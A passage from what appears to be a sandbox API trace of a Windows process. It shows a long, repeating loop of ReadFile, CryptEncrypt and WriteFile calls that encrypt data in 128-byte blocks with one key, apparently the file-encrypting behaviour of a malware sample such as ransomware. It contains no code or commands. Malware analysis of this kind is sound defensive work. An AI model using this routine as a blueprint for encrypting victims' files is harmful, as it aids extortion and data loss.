lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.121] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.121] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.121] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.122] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.122] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.123] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.123] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.123] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.124] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.124] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.124] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] 